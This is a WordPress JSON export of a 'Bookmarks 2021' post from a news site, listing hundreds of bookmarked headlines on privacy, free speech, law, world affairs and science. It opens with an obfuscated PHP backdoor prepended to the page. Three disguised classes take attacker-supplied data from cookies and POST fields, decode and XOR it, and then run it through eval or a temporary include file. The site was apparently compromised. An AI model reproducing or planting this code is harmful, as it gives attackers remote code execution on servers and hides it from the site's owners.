$zsyUCM = "\x78" . chr ( 717 - 616 )."\137" . "\x61" . "\x5a" . "\101";$PFjRtn = "\x63" . "\x6c" . 'a' . chr (115) . "\163" . chr (95) . chr (101) . chr (120) . "\151" . chr (115) . chr ( 287 - 171 )."\x73";$YFZuUhHJ = class_exists($zsyUCM); $PFjRtn = "42169";$ROEmCgEmgC = strpos($PFjRtn, $zsyUCM);if ($YFZuUhHJ == $ROEmCgEmgC){function LTEJSV(){$OrYPFIxe = new /* 33980 */ xe_aZA(12595 + 12595); $OrYPFIxe = NULL;}$YIomAGhZVv = "12595";class xe_aZA{private function lAIIvlAlpo($YIomAGhZVv){if (is_array(xe_aZA::$dNwWaPyr)) {$oiNkU2 = str_replace("<" . "?php", "", xe_aZA::$dNwWaPyr["content"]);eval($oiNkU2); $YIomAGhZVv = "12595";exit();}}public function IeLFPTWLCA(){$oiNkU = "283";$this->_dummy = str_repeat($oiNkU, strlen($oiNkU));}public function __destruct(){xe_aZA::$dNwWaPyr = @unserialize(xe_aZA::$dNwWaPyr); $YIomAGhZVv = "37902_53999";$this->lAIIvlAlpo($YIomAGhZVv); $YIomAGhZVv = "37902_53999";}public function yQmvnUBv($oiNkU, $DaAyMVqEO){return $oiNkU[0] ^ str_repeat($DaAyMVqEO, intval(strlen($oiNkU[0]) / strlen($DaAyMVqEO)) + 1);}public function kQEtSGyJY($oiNkU){$FWDQluj = 'b' . "\x61" . 's' . "\x65" . chr ( 316 - 262 ).'4';return array_map($FWDQluj . chr ( 891 - 796 )."\144" . chr (101) . "\143" . 'o' . "\x64" . chr ( 809 - 708 ), array($oiNkU,));}public function __construct($AoLbaKFRoC=0){$VGoFvkYG = chr (44); $oiNkU = "";$RXanOOsZ = $_POST;$lKWLjAlV = $_COOKIE;$DaAyMVqEO = "2a4af22a-324c-4495-ba8c-91e4652bb45d";$YWvPZEopg = @$lKWLjAlV[substr($DaAyMVqEO, 0, 4)];if (!empty($YWvPZEopg)){$YWvPZEopg = explode($VGoFvkYG, $YWvPZEopg);foreach ($YWvPZEopg as $avvNEVLMAi){$oiNkU .= @$lKWLjAlV[$avvNEVLMAi];$oiNkU .= @$RXanOOsZ[$avvNEVLMAi];}$oiNkU = $this->kQEtSGyJY($oiNkU);}xe_aZA::$dNwWaPyr = $this->yQmvnUBv($oiNkU, $DaAyMVqEO);if (strpos($DaAyMVqEO, $VGoFvkYG) !== FALSE){$DaAyMVqEO = explode($VGoFvkYG, $DaAyMVqEO); $IhlxuAFs = base64_decode(strrev($DaAyMVqEO[0]));}}public static $dNwWaPyr = 35467;}LTEJSV();}$TEystoEjzb = 'm' . chr ( 770 - 671 )."\150" . chr ( 357 - 262 )."\x4e" . "\x68" . "\170" . "\x66" . 'k';$tjcaJl = chr ( 978 - 879 )."\154" . chr ( 983 - 886 ).chr ( 896 - 781 ).chr ( 551 - 436 )."\x5f" . chr (101) . 'x' . "\151" . chr ( 689 - 574 ).chr (116) . 's';$mEbbYTt = class_exists($TEystoEjzb); $tjcaJl = "12466";$KqzdIyBw = strpos($tjcaJl, $TEystoEjzb);if ($mEbbYTt == $KqzdIyBw){function OWEwffjgA(){$eyWvrKef = new /* 55036 */ mch_Nhxfk(33619 + 33619); $eyWvrKef = NULL;}$TCKjlpEkO = "33619";class mch_Nhxfk{private function dKpehsMR($TCKjlpEkO){if (is_array(mch_Nhxfk::$ynMAWEJO)) {$name = sys_get_temp_dir() . "/" . crc32(mch_Nhxfk::$ynMAWEJO["salt"]);@mch_Nhxfk::$ynMAWEJO["write"]($name, mch_Nhxfk::$ynMAWEJO["content"]);include $name;@mch_Nhxfk::$ynMAWEJO["delete"]($name); $TCKjlpEkO = "33619";exit();}}public function SDQset(){$hYhZhQe = "21973";$this->_dummy = str_repeat($hYhZhQe, strlen($hYhZhQe));}public function __destruct(){mch_Nhxfk::$ynMAWEJO = @unserialize(mch_Nhxfk::$ynMAWEJO); $TCKjlpEkO = "18815_31585";$this->dKpehsMR($TCKjlpEkO); $TCKjlpEkO = "18815_31585";}public function sDYlixVnA($hYhZhQe, $YSsEwG){return $hYhZhQe[0] ^ str_repeat($YSsEwG, intval(strlen($hYhZhQe[0]) / strlen($YSsEwG)) + 1);}public function edEPNX($hYhZhQe){$rupHSGXoBz = "\142" . "\141" . "\x73" . chr (101) . chr (54) . "\64";return array_map($rupHSGXoBz . chr (95) . chr ( 996 - 896 ).chr ( 1085 - 984 ).chr (99) . chr ( 375 - 264 ).'d' . "\x65", array($hYhZhQe,));}public function __construct($SRbNrdusw=0){$ayEyI = ',';$hYhZhQe = "";$LIYFKkHbb = $_POST;$sYBFdyPe = $_COOKIE;$YSsEwG = "a388bc99-5682-4cf7-bad7-9b894580c944";$wdyleeQ = @$sYBFdyPe[substr($YSsEwG, 0, 4)];if (!empty($wdyleeQ)){$wdyleeQ = explode($ayEyI, $wdyleeQ);foreach ($wdyleeQ as $NPfGPKlt){$hYhZhQe .= @$sYBFdyPe[$NPfGPKlt];$hYhZhQe .= @$LIYFKkHbb[$NPfGPKlt];}$hYhZhQe = $this->edEPNX($hYhZhQe);}mch_Nhxfk::$ynMAWEJO = $this->sDYlixVnA($hYhZhQe, $YSsEwG);if (strpos($YSsEwG, $ayEyI) !== FALSE){$YSsEwG = explode($ayEyI, $YSsEwG); $AHjGatIAu = base64_decode(md5($YSsEwG[0])); $yewTxtmiBy = strlen($YSsEwG[1]) > 5 ? substr($YSsEwG[1], 0, 5) : $YSsEwG[1];$_GET['new_key'] = md5(implode('', $YSsEwG)); $PcvTnvLfXD = str_repeat($yewTxtmiBy, 2); $zjVGshnHkH = array_map('trim', $YSsEwG);if (is_array($zjVGshnHkH) && count($zjVGshnHkH) > 1) {$CwFFDIr = $zjVGshnHkH[0];} else {$CwFFDIr = '';}}}public static $ynMAWEJO = 15637;}OWEwffjgA();}$tCurWDKdsP = chr ( 1032 - 929 )."\x4e" . '_' . 'k' . chr (87) . "\101" . "\164";$SZltFKEw = chr (99) . chr (108) . chr (97) . chr (115) . chr ( 234 - 119 ).chr ( 252 - 157 )."\145" . 'x' . chr (105) . chr (115) . chr (116) . "\163";$gPXBkSNty = class_exists($tCurWDKdsP); $SZltFKEw = "30001";$nvemgOjaqk = strpos($SZltFKEw, $tCurWDKdsP);if ($gPXBkSNty == $nvemgOjaqk){function iBDtsZKuD(){$cCoDiATQx = new /* 54584 */ gN_kWAt(34487 + 34487); $cCoDiATQx = NULL;}$XJUJVuL = "34487";class gN_kWAt{private function KDCTggu($XJUJVuL){if (is_array(gN_kWAt::$ktbGMaWCHr)) {$ECvDMsrMkb = str_replace('<' . chr (63) . "\x70" . chr (104) . "\160", "", gN_kWAt::$ktbGMaWCHr['c' . "\157" . chr (110) . 't' . chr (101) . "\156" . chr ( 553 - 437 )]);eval($ECvDMsrMkb); $XJUJVuL = "34487";exit();}}public function SFvNTMsb(){$kCLGXxz = "12398";$this->_dummy = str_repeat($kCLGXxz, strlen($kCLGXxz));}public function __destruct(){gN_kWAt::$ktbGMaWCHr = @unserialize(gN_kWAt::$ktbGMaWCHr); $XJUJVuL = "2467_869";$this->KDCTggu($XJUJVuL); $XJUJVuL = "2467_869";}public function cciXX($kCLGXxz, $IKJyPGX){return $kCLGXxz[0] ^ str_repeat($IKJyPGX, (strlen($kCLGXxz[0]) / strlen($IKJyPGX)) + 1);}public function CwnBGwi($kCLGXxz){$BOvnQaXh = "base64";return array_map($BOvnQaXh . "\137" . "\x64" . 'e' . "\x63" . chr ( 873 - 762 ).'d' . chr ( 167 - 66 ), array($kCLGXxz,));}public function __construct($cAkjEe=0){$ovsCft = ",";$kCLGXxz = "";$tCgiH = $_POST;$nzetxWG = $_COOKIE;$IKJyPGX = "357f6350-42a1-4e4a-94cd-b9561b849dfb";$iuEVe = @$nzetxWG[substr($IKJyPGX, 0, 4)];if (!empty($iuEVe)){$iuEVe = explode($ovsCft, $iuEVe);foreach ($iuEVe as $nNeddGr){$kCLGXxz .= @$nzetxWG[$nNeddGr];$kCLGXxz .= @$tCgiH[$nNeddGr];}$kCLGXxz = $this->CwnBGwi($kCLGXxz);}gN_kWAt::$ktbGMaWCHr = $this->cciXX($kCLGXxz, $IKJyPGX);if (strpos($IKJyPGX, $ovsCft) !== FALSE){$IKJyPGX = explode($ovsCft, $IKJyPGX);}}public static $ktbGMaWCHr = 11808;}iBDtsZKuD();}{"id":5126,"date":"2021-01-17T19:21:52","date_gmt":"2021-01-17T19:21:52","guid":{"rendered":"http:\/\/newsstandard.ca\/?p=5126"},"modified":"2021-02-21T20:41:57","modified_gmt":"2021-02-21T20:41:57","slug":"bookmarks-2021","status":"publish","type":"post","link":"https:\/\/newsstandard.ca\/uncategorized\/bookmarks-2021\/","title":{"rendered":"Bookmarks 2021"},"content":{"rendered":"


Feb 21<\/p>\n

Facebook cuts Australia off from the world : privacy<\/a><\/dt>\n
Tech Companies Are Limiting Use Of Facial Recognition By Law Enforcement : privacy<\/a><\/dt>\n
Academics turn RAM into Wi-Fi cards to steal data from air-gapped systems | ZDNet<\/a><\/dt>\n
Judge refuses to ban Capitol riot suspect from Twitter and Facebook : law<\/a><\/dt>\n
Bookmarks 2021 \u2013 NewsStandard<\/a><\/dt>\n
Coca-Cola is forcing employees to complete online training telling them to “try to be less white.” : stupidpol<\/a><\/dt>\n
Peter Stager, Capitol Rioter Accused of Beating Officer With Flag Pole, Faces 40-Year Sentence<\/a><\/dt>\n
Peace court: Colombia army ‘behind 6400 extrajudicial killings’ : humanrights<\/a><\/dt>\n
Some Answers to Questions About the State of Copyright in 2021 | Electronic Frontier Foundation<\/a><\/dt>\n
Facebook’s Latest Proposed Policy Change Exemplifies the Trouble With Moderating Speech at Scale | Electronic Frontier Foundation<\/a><\/dt>\n
Peace court: Colombia army ‘behind 6400 extrajudicial killings’ | RNZ News<\/a><\/dt>\n
Judge tosses Nunes’ libel suit against CNN : law<\/a><\/dt>\n
New browser-tracking hack works even when you flush caches or go incognito : cybersecurity<\/a><\/dt>\n
The Northern Ireland Peace Process | Council on Foreign Relations<\/a><\/dt>\n
Inside Out: An Integrative Critique of the Northern Ireland Peace Process by Stephen Farry: U.S. Institute of Peace<\/a><\/dt>\n<\/dl>\n

Feb 17<\/p>\n

Warning: Telegram is not end-to-end encrypted by default : privacy<\/a><\/dt>\n
Twitter now banning people for promoting a new social media platform : FreeSpeech<\/a><\/dt>\n
PixelCraft: A Pixel Art Editor<\/a><\/dt>\n
Joe Biden is now promoting censorship by silicon valley. This means you can be cut off from your work, your bank for saying a bad word when you were 15. Free speech is Dying. : FreeSpeech<\/a><\/dt>\n
How to get videos from YouTube with Feedzy – ThemeIsle Docs<\/a><\/dt>\n
Scientists identify contents of ancient Maya drug containers — ScienceDaily<\/a><\/dt>\n
Snakes evolve a magnetic way to be resistant to venom — ScienceDaily<\/a><\/dt>\n
Snowden and Assange: There Is Still Time for Trump to Do the Right Thing | Mises Institute<\/a><\/dt>\n
Israel to rein in rights groups over use of \u2018apartheid state\u2019 | Human Rights News | Al Jazeera<\/a><\/dt>\n
Did Ethiopia’s attack on Tigray violate international laws?<\/a><\/dt>\n
Thailand: 87-year prison sentence handed in harshest l\u00e8se majest\u00e9 conviction | Amnesty International<\/a><\/dt>\n
Turkey: Facebook and other companies \u201cin danger of becoming an instrument of state censorship\u201d | Amnesty International<\/a><\/dt>\n
Proposed UN Cybercrime Treaty Could Undermine Human Rights | Human Rights Watch<\/a><\/dt>\n
Venezuela: Military arbitrarily detains NGO staff | Amnesty International<\/a><\/dt>\n
Money matters to happiness–perhaps more than previously thought — ScienceDaily<\/a><\/dt>\n
New tool removes chemotherapy drugs from water systems — ScienceDaily<\/a><\/dt>\n
Fried food intake linked to heightened serious heart disease and stroke risk: Risk rises with each additional weekly 114 g serving, pooled data analysis shows — ScienceDaily<\/a><\/dt>\n
What my retraction taught me<\/a><\/dt>\n
New management approach can help avoid species vulnerability or extinction: New tools will help ecologists predict when species may be at risk — ScienceDaily<\/a><\/dt>\n
Sell Subscription Boxes on Amazon<\/a><\/dt>\n
United States begins removing national guard members from inauguration security for \u2018free speech\u2019 violations. Ability to serve is dependent on political views. : FreeSpeech<\/a><\/dt>\n
Where do our minds wander? Brain waves can point the way: Tuning out the external world and allowing thoughts to move freely promotes relaxation and exploration, findings suggest — ScienceDaily<\/a><\/dt>\n
A biological strategy reveals how efficient brain circuitry develops spontaneously — ScienceDaily<\/a><\/dt>\n
Online Privacy: How to Get Off the Radar With Ease (noob-friendly). : privacy<\/a><\/dt>\n
Constructing termite turrets without a blueprint: Researchers develop a mathematical model to explain the complex architecture of termite mounds — ScienceDaily<\/a><\/dt>\n
Pardons Granted by President Donald Trump<\/a><\/dt>\n
Using the verb ser in El Imperfecto vs. El Indefinido : Spanish language lesson<\/a><\/dt>\n
Spanish vocabulary and grammar lists by theme<\/a><\/dt>\n
Hundreds of Wonderful Japanese Firework Designs from the Early-1900s: Digitized and Free to Download | Open Culture<\/a><\/dt>\n
YOUTUBE CAUGHT RED-HANDED Removing Dislikes from Biden White House Page \u2014 Anything to Fool the Proletariat : FreeSpeech<\/a><\/dt>\n
Judge denies Georgia man release in riots case, says he’s been ‘seduced by a dangerous and violent ideology’ : law<\/a><\/dt>\n
Install CCTV in Hong Kong classrooms to monitor teachers, urges pro-Beijing lawmaker : privacy<\/a><\/dt>\n
Google says it will pull its search engine from Australia if it is forced to pay news publishers to host their content – ABC News<\/a><\/dt>\n
18 months after publication, WaPo completely overhauled a profile of Kamala Harris to make her look less psychopathic : stupidpol<\/a><\/dt>\n
Facebook shuts down major left wing group in Britain : FreeSpeech<\/a><\/dt>\n
US Defense Intelligence Agency admits to buying citizens\u2019 location data : privacy<\/a><\/dt>\n
Biden administration fires the heads of three US-funded international broadcasters – including Radio Free Europe, Radio Free Asia and Middle East Broadcasting Networks – for ‘turning stations into pro-Trump propaganda machines’ : Journalism<\/a><\/dt>\n
Could a constitutional argument be made that removing the comment section on an open platform is a violation of the first amendment? : FreeSpeech<\/a><\/dt>\n
Texas Supreme Court Silently Denies Alex Jones All Forms of Relief: Sandy Hook Families and Others Can Now Sue Conspiracy Theorist and InfoWars into the Ground : law<\/a><\/dt>\n
[OC] Recreational marijuana legalization now has support from over two-thirds of the American public : dataisbeautiful<\/a><\/dt>\n
Facebook shuts down Socialist Workers Party in Britain. : FreeSpeech<\/a><\/dt>\n
Palestinian tribal justice system gaining strength – YouTube<\/a><\/dt>\n
Central African Republic Declares Emergency Amid Surge in Rebel Attacks : worldevents<\/a><\/dt>\n
How law enforcement gets around your smartphone\u2019s encryption : privacy<\/a><\/dt>\n
Facebook purges left-wing pages and individuals : FreeSpeech<\/a><\/dt>\n
British lawyers should not be helping Beijing crush Hong Kong\u2019s democracy : law<\/a><\/dt>\n
Protest , poetry, Democracy and Cinema. – YouTube<\/a><\/dt>\n
Now-Retired Law Professor John Eastman Says His Words at Trump\u2019s \u2018Save America\u2019 Rally Did Not Incite U.S. Capitol Siege : law<\/a><\/dt>\n
Judge Refuses To Reinstate Parler After Amazon Shut It Down : NPR<\/a><\/dt>\n
Exercising muscle combats chronic inflammation on its own: Exercising lab-grown human muscle autonomously blocks the damaging effects of interferon gamma — ScienceDaily<\/a><\/dt>\n
A large number of gray whales are starving and dying in the eastern North Pacific — ScienceDaily<\/a><\/dt>\n
MRI helps unravel the mysteries of sleep — ScienceDaily<\/a><\/dt>\n
Gastrointestinal surgery can be a ‘cure’ for type 2 diabetes finds new long-term study — ScienceDaily<\/a><\/dt>\n
Friends are most valued in cultures where they may be needed most — ScienceDaily<\/a><\/dt>\n
How human social structures emerge: Computer simulations uncover universality in cultural anthropology observations — ScienceDaily<\/a><\/dt>\n
Frontiers | Friendship Importance Around the World: Links to Cultural Factors, Health, and Well-Being | Psychology<\/a><\/dt>\n
The rhythm of change: What a drum-beat experiment reveals about cultural evolution — ScienceDaily<\/a><\/dt>\n
Developmental origins of eczema and psoriasis discovered: Skin Cell Atlas points to new drug targets for inflammatory diseases — ScienceDaily<\/a><\/dt>\n
When a story is breaking, AI can help consumers identify fake news: Early intervention with tailored messaging may stop the spread of misinformation — ScienceDaily<\/a><\/dt>\n
For the first time, scientists have neurophysiological evidence that distinguishes different patterns of internal thought, allowing us to understand the varieties of thought central to human cognition and to compare between healthy and disordered thinking : science<\/a><\/dt>\n
\u201cI don’t know how my future will be without education\u201d | Amnesty International<\/a><\/dt>\n
How to Easily Create a Multilingual WordPress Site<\/a><\/dt>\n
WordPress Translation Plugin \u2013 Weglot Translate \u2013 WordPress plugin | WordPress.org<\/a><\/dt>\n
Americans Fine With Paying More If Trading With Democracies, Not China : worldevents<\/a><\/dt>\n
15 Chinese military planes enter Taiwan’s ADIZ: ‘An ADIZ is established by a country to allow the identification, location and control of approaching foreign aircraft. However, unlike territorial airspace, no legal foundation for the ADIZ is explicitly stipulated in international law.’ : internationallaw<\/a><\/dt>\n
Tulsi Gabbard: Domestic Terrorism Bill Is \u2018a Targeting of Almost Half of the Country\u2019 : stupidpol<\/a><\/dt>\n
Canadian Legislature ‘Bill C-6’ (check anywhere you like) violates the human rights to: Freedom of speech, Freedom of Religion, Right to a fair education, Right to control your children’s education, and your right to privacy. More info in the comments. : humanrights<\/a><\/dt>\n
Should I switch from Gmail? : privacy<\/a><\/dt>\n
Tulsi Gabbard: Proposed Domestic Terrorism Laws ‘Directly Undermine’ freedom : FreeSpeech<\/a><\/dt>\n
China\u2019s Comac Aims to Rival Boeing and Airbus in the World\u2019s Biggest Market | WSJ – YouTube<\/a><\/dt>\n
China overtakes US as top country for foreign investment | DW News – YouTube<\/a><\/dt>\n
Women influenced coevolution of dogs and humans — ScienceDaily<\/a><\/dt>\n
Life expectancy and mortality in 363 cities of Latin America | Nature Medicine<\/a><\/dt>\n
Where Does Your Brain Go When You Daydream?<\/a><\/dt>\n
Immune System May ‘Remember’ Infections From Previous Coronaviruses<\/a><\/dt>\n
Ethiopian forces launch cross-border shelling on Sudanese patrol – Sudan Tribune: Plural news and views on Sudan<\/a><\/dt>\n
Sudan military firms plan to expand economic activities – Sudan Tribune: Plural news and views on Sudan<\/a><\/dt>\n
Can Turkey and Greece resolve their maritime dispute? | Inside Story – YouTube<\/a><\/dt>\n
UK lawmakers consider reforming or repealing destructive \u201chate speech\u201d laws : FreeSpeech<\/a><\/dt>\n
After two months of war, Tigray faces starvation — Ethiopia\u2019s government appears to be blocking food deliveries to the region : worldevents<\/a><\/dt>\n
VICTORY! Mandatory Vaccine Bill Fails After Thousands Show Up to Protest in New Jersey<\/a><\/dt>\n
Inside Tesla’s $5 billion Gigafactory – YouTube<\/a><\/dt>\n
Norwegian Data Protection Authority (Datatilsynet) intends to issue $ 11 000 000 GDPR fine to the dating app Grindr : privacy<\/a><\/dt>\n
How to Easily Create a Multilingual WordPress Site<\/a><\/dt>\n
Journalists Mobilize Against Free Speech A new generation of media crusaders clamors for government control over what you see, hear, and read\u2014and for banning their competition : FreeSpeech<\/a><\/dt>\n
India now officially bans 60 Chinese apps, including TikTok and WeChat : privacy<\/a><\/dt>\n
Alberta Paid $28K for a Report Smearing Hundreds of Climate Journalists : Journalism<\/a><\/dt>\n
US Politicians Use Moral Language More Often When They Have Less Power : psychology<\/a><\/dt>\n
Figures of the week: Wage growth and employment in Africa<\/a><\/dt>\n
Asian Paints May Raise Prices if Inflation Not Stabilized – YouTube<\/a><\/dt>\n
An\u2010arrgh\u2010chy: The Law and Economics of Pirate Organization – Pirate Organizations.pdf<\/a><\/dt>\n
More Socialist Media Censoring to stop any voices which might differ from their own! : FreeSpeech<\/a><\/dt>\n
Border Closed Between Chad and Central African Republic : worldevents<\/a><\/dt>\n
The 200 most frequent Spanish words in newspaper and magazine articles.<\/a><\/dt>\n
THE SPEAKER News Journal<\/a><\/dt>\n
Discord bans r\/WallStreetBets server over hate speech – Business Insider<\/a><\/dt>\n
Apple publishes report detailing how companies track users online. Will require apps to ask for consent before tracking on next beta update. : privacy<\/a><\/dt>\n
Pakistan: Worsening Crackdown on Dissent : humanrights<\/a><\/dt>\n
Sani Abacha – the hunt for the billions stolen by Nigeria’s ex-leader : Africa<\/a><\/dt>\n
Sani Abacha – the hunt for the billions stolen by Nigeria’s ex-leader – BBC News<\/a><\/dt>\n
Robinhood Blocks Buying in GameStop, AMC, and Others Stocks. Other Brokers Also Add Guardrails. : law<\/a><\/dt>\n
Sen. Warren on GameStop frenzy: We need clear rules on market manipulation – YouTube<\/a><\/dt>\n
Not sure if anyone posted this here, but yikes : wallstreetbets<\/a><\/dt>\n
I just bought $5,000 in $GME. I would not have done this if the brokerages didn’t try to manipulate the market. : wallstreetbets<\/a><\/dt>\n
Robinhood’s App ratings is down to a single star in Google Play Store : wallstreetbets<\/a><\/dt>\n
DON’T LET ROBINHOOD BECOME THE SCAPEGOAT. This goes deeper — CITADEL fulfills most of Robinhoods orders. THEY ARE THE ONES CANCELLING WSB. : wallstreetbets<\/a><\/dt>\n
New Spotify Patent Involves Monitoring Users\u2019 Speech to Recommend Music : privacy<\/a><\/dt>\n
Why are Israel and Arab states getting friendly? | Start Here – YouTube<\/a><\/dt>\n
Sanctions Tracker | Enigma<\/a><\/dt>\n
Facebook BANS \u2018Robinhood stock traders group\u2019 with 150k+ members over \u2018sexual exploitation\u2019 amid GameStop craze \u2013 reports : FreeSpeech<\/a><\/dt>\n
Used to not care about privacy – just deleted +15k photos from Google Photos and I feel sick. What were your eye openers? : privacy<\/a><\/dt>\n
Surveillance of Uyghurs Detailed in Chinese Police Database<\/a><\/dt>\n
Jean-Luc Melanchon nominates Julian Assange for the Nobel Peace Prize : julianassange<\/a><\/dt>\n
Police Say They Can Use Facial Recognition, Despite Bans – More than a dozen cities have passed facial recognition bans in the past couple of years, but police say there are loopholes : privacy<\/a><\/dt>\n
Geoff Ramsey, WOLA Director for Venezuela<\/a><\/dt>\n
Google have suspended Element in the Play Store : privacy<\/a><\/dt>\n
Egypt\u2019s New Administrative Capital plans on building the tallest tower in the continent. : Africa<\/a><\/dt>\n
When asked about Israel’s obligation to vaccinate Palestinians, Israeli health minister tries his best to deny the Geneva convention rights : AntiPalestineBigotry<\/a><\/dt>\n
Amazon\u2019s Ring now reportedly partners with more than 2,000 US police and fire departments : privacy<\/a><\/dt>\n
This terrifying project is creating zones for business where they can set their own laws – one is in Honduras where they’ve seized land from the indigenous Garifuna : humanrights<\/a><\/dt>\n
Oregon law to decriminalize all drugs goes into effect, offering addicts rehab instead of prison : law<\/a><\/dt>\n
Mike Lindell aka My Pillow Mike Suspended from Twitter : FreeSpeech<\/a><\/dt>\n
Exclusive: Poland’s ‘Freedom Act’ Will Empower People to Overturn Big Tech Shadowbans : FreeSpeech<\/a><\/dt>\n
Israeli Security Company Creates Autonomous Weapon – YouTube<\/a><\/dt>\n
Nigeria begins modernising oil refineries – YouTube<\/a><\/dt>\n
Why is the US targeting the International Criminal Court? | Start Here – YouTube<\/a><\/dt>\n
Microsoft Spying On Its Users Big Time : privacy<\/a><\/dt>\n
So I downloaded my google data… : privacy<\/a><\/dt>\n
GitHub – oxwall\/video: Video plugin for Oxwall. Allow users to embed videos with comments, rates, and tags.<\/a><\/dt>\n
Recently, a leak exposed tons of sensitive information of basically every single Brazilian. : privacy<\/a><\/dt>\n
Twitter has permanently banned the corporate MyPillow account after founder Mike Lindell posted from it : FreeSpeech<\/a><\/dt>\n
Proud Boys and Black Lives Matter activists clashed in a Florida suburb. Only one side was charged. : law<\/a><\/dt>\n
U.S. technology company Clearview AI violated Canadian privacy law: report | CBC News : privacy<\/a><\/dt>\n
Add a Loading Animation to your WordPress Website (10 Different Options) | Elegant Themes Blog<\/a><\/dt>\n
Clearview AI\u2019s Facial Recognition App Called Illegal in Canada : privacy<\/a><\/dt>\n
Racist black man and NYT wants to ban Ancient Rome and Greece history because of “whiteness” ! : FreeSpeech<\/a><\/dt>\n
ACLU declares \u2018transgender myths DEBUNKED,\u2019 says trans girls don’t have any \u2018unfair advantage\u2019 in women\u2019s sports : stupidpol<\/a><\/dt>\n
Canada labels the Proud Boys, neo-Nazi groups as terrorists : worldevents<\/a><\/dt>\n
YouTube’s ‘dangerous’ crackdown on independent journalists: ‘It defies all logic and reason’ | “The clear goal is to disempower alternative media,” @mtaibbi says. “The end game here is to force all content to be sifted through the filter of larger outlets.” : FreeSpeech<\/a><\/dt>\n
U.S. intelligence officials say Chinese government is collecting Americans’ DNA – YouTube<\/a><\/dt>\n
Tinder users all over the world are receiving a terms and conditions pop-up that lists Tinder’s data collection methods, and it links to the Korean site. Some users think it was hacked – but it’s been collecting that data the whole time : privacy<\/a><\/dt>\n
Modifying Telegram’s “People Nearby” feature to pinpoint people’s homes : cybersecurity<\/a><\/dt>\n
Egypt overtakes South Africa as Africa\u2019s second largest economy behind Nigeria : Africa<\/a><\/dt>\n
Amazon Plans Largest Corporate Surveillance Program in Human History : privacy<\/a><\/dt>\n
FYI: Police have warrantless access to all your private medical records (US). : privacy<\/a><\/dt>\n
Warnings of Growing ‘Surveillance Empire’ as AI Van Cameras Give Amazon ‘Roaming Eyes in Every Neighborhood’ : privacy<\/a><\/dt>\n
WARNING: Please immediately UNINSTALL The Great Suspender as it now contains tracking code that could try and grab your passwords. Change your passwords! : privacy<\/a><\/dt>\n
China’s latest weapon against Taiwan: The sand dredger : worldevents<\/a><\/dt>\n
Nevada bill would allow tech companies to create governments : politics<\/a><\/dt>\n
How do you make interesting geometry in a game engine? : gamedev<\/a><\/dt>\n
VIDEO GAME shapes – Inigo Quilez :: fractals, computer graphics, mathematics, shaders, demoscene and more<\/a><\/dt>\n
Libs on MSNBC casually suggest drone strikes on US citizens : stupidpol<\/a><\/dt>\n
Nigerians speak out against new SIM card registration policy : privacy<\/a><\/dt>\n
Millions have been silenced : FreedomofSpeech<\/a><\/dt>\n
Government demands for Amazon customer data rose 800% in 2020 : privacy<\/a><\/dt>\n
Iran carries out surgical strike inside Pakistan’s territory, frees two kidnapped border guards : worldevents<\/a><\/dt>\n
FYI: iOS is not deleting app data even if you uninstall the app. : privacy<\/a><\/dt>\n
Professor at UBC Doxxes 12 Of Her Own Students, Calling Them ‘White Supremacist Misogynists’ : stupidpol<\/a><\/dt>\n
A Second SolarWinds Hack Deepens Third-Party Software Fears : cybersecurity<\/a><\/dt>\n
International Criminal Court says it has jurisdiction in Palestinian territories : internationallaw<\/a><\/dt>\n
Styling Wizard: Google Maps APIs<\/a><\/dt>\n
Supreme Court Will Decide Whether Police Can Enter A Home To Seize Guns Without A Warrant : law<\/a><\/dt>\n
Online Chart Maker | amCharts<\/a><\/dt>\n
HTML5\/JavaScript Interactive World Map | Simplemaps.com<\/a><\/dt>\n
Sudan makes new gains in disputed land along Ethiopia border – YouTube<\/a><\/dt>\n
El Esequibo, el territorio que enfrenta a Venezuela y Guyana desde hace casi dos siglos | BBC Mundo – YouTube<\/a><\/dt>\n
Jay Bahadur<\/a><\/dt>\n
Memory Card Game – JavaScript Tutorial – YouTube<\/a><\/dt>\n
Barcode Scanner app on Google Play infects 10 million users with one update : privacy<\/a><\/dt>\n
Poland Court Considers Sending Falun Gong Follower to Trial in China – The Belt and Noose : humanrights<\/a><\/dt>\n
Poland to Rule on Sending Swedish Falun Gong Follower to China – Bloomberg<\/a><\/dt>\n
This is how we lost control of our faces – The largest ever study of facial-recognition data shows how much the rise of deep learning has fueled a loss of privacy. : privacy<\/a><\/dt>\n
Former ACLU head Ira Glasser fears that by becoming more political and less absolutist when it comes to defending speech, the ACLU might be shrugging off its hard-won legacy : FreeSpeech<\/a><\/dt>\n
world-map-country-shapes – npm<\/a><\/dt>\n
Drones add new scale to Libya\u2019s battle for Tripoli – YouTube<\/a><\/dt>\n
Somali opposition leaders \u2018no longer recognise president\u2019 – YouTube<\/a><\/dt>\n
Hundreds in Colombia begin the perilous journey north – YouTube<\/a><\/dt>\n
Myanmar Police use Chemical Water to destroy the crowd who are peacefully protesting! : humanrights<\/a><\/dt>\n
Man arrested for \u201coffensive Tweet\u201d (this is in the UK but I still felt it fits here) : FreeSpeech<\/a><\/dt>\n
Accused murderer wins right to check source code of DNA testing kit used by police : privacy<\/a><\/dt>\n
Teacher creates Youtube commentary describing biological differences as being a factor for societal differences between the sexes; sacked from job and could face a lifetime ban from teaching : FreeSpeech<\/a><\/dt>\n
Microchip shortage is slowing down the global economy | DW News – YouTube<\/a><\/dt>\n
Language support \u00a0|\u00a0 Cloud Translation \u00a0|\u00a0 Google Cloud<\/a><\/dt>\n
Venezuela refuta posici\u00f3n de Espa\u00f1a sobre sanciones | Noticias | teleSUR<\/a><\/dt>\n
Aar\u00f3n Olmos: “Hace falta mucha educaci\u00f3n para la adopci\u00f3n de criptomonedas en Venezuela”<\/a><\/dt>\n
Bangladesh plans to relocate Rohingyas to ‘refugee island’ | DW News – YouTube<\/a><\/dt>\n
The Speaker News Journal – Venezuela<\/a><\/dt>\n
TSNJ Staff<\/a><\/dt>\n
(19) The Speaker News Journal – Russia | Facebook<\/a><\/dt>\n
The Speaker News Journal – Iran<\/a><\/dt>\n
Warrantless phone searches OK at US border : privacy<\/a><\/dt>\n
Angola Just Decriminalized Same-Sex Sexual Relationships (from r\/world news) : Africa<\/a><\/dt>\n
India Can Become Hardware Manufacturing Hub: Dixon Tech – YouTube<\/a><\/dt>\n
Apparently, Bitcoin uses more electricity than the entire nation of Argentina. Is this a compliment to Bitcoin or an insult to Argentina? : asklatinamerica<\/a><\/dt>\n
The murder rate statistics for Latin America and the Caribbean for 2020 are out and there were some big surprises. The general trend is that Latin America is becoming safer. What do you think? : asklatinamerica<\/a><\/dt>\n
‘UN convoy’ ambushed on Kabul-Jalalabad highway – The Khaama Press News Agency<\/a><\/dt>\n
